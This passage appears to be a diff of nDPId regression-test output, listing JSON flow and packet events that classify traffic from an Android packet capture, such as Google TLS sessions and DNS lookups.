{"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} 00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} 
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} 
-01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7440000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} +01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7560000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":180000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} 
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} 